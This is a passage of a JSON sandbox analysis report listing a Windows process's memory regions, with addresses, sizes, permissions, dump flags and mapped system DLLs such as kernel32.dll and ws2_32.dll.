"size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3946", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_3947", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:31.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3948", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:31.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3949", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:31.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3950", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:31.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3951", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:31.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3952", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:31.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3953", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:31.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3954", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:31.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3955", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:31.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 5111807, "entry_point": 0, "filename": null, "id": "region_3956", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:31.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_3957", "name": "private_0x0000000000670000", "norm_filename": null, "region_type": "private_memory", "start_va": 6750208, "timestamp": "00:01:31.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3958", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:31.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787645951, "entry_point": 1787433941, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3959", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:31.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787695777, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3960", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:31.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787793407, "entry_point": 1787762086, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3961", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:31.289", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787822080, "type": "region", "version": 1 }, "end_va": 1787891711, "entry_point": 1787826944, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3962", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787822080, "timestamp": "00:01:31.289", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3963", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:31.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3964", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:31.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3965", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:31.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3966", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:31.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3967", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:31.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3968", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:31.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3969", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:31.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3970", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:31.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3971", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:31.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3972", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:31.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3973", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:31.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3974", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:31.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3975", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:31.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3976", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:31.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3977", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:31.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3978", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:31.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3979", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:31.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3980", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:31.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3981", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:31.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3982", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:31.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3983", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:31.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3984", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:31.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3985", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:31.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3986", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:31.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 6717439, "entry_point": 0, "filename": null, "id": "region_3987", "name": "pagefile_0x00000000004e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5111808, "timestamp": "00:01:31.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3988", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:31.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3989", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:31.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3990", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:31.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3991", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:31.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3992", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:31.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_3993", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:31.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3994", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:31.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_3995", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:31.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_3996", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:31.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 7602175, "entry_point": 6815744, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3997", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 6815744, "timestamp": "00:01:31.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 8126463, "entry_point": 0, "filename": null, "id": "region_3998", "name": "private_0x0000000000780000", "norm_filename": null, "region_type": "private_memory", "start_va": 7864320, "timestamp": "00:01:31.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9834495, "entry_point": 0, "filename": null, "id": "region_3999", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:31.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_4000", "name": "pagefile_0x0000000000970000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9895936, "timestamp": "00:01:31.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31260671, "entry_point": 0, "filename": null, "id": "region_4001", "name": "private_0x0000000001d90000", "norm_filename": null, "region_type": "private_memory", "start_va": 30998528, "timestamp": "00:01:31.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4002", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:31.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4003", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:31.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_4004", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:31.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4005", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:31.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 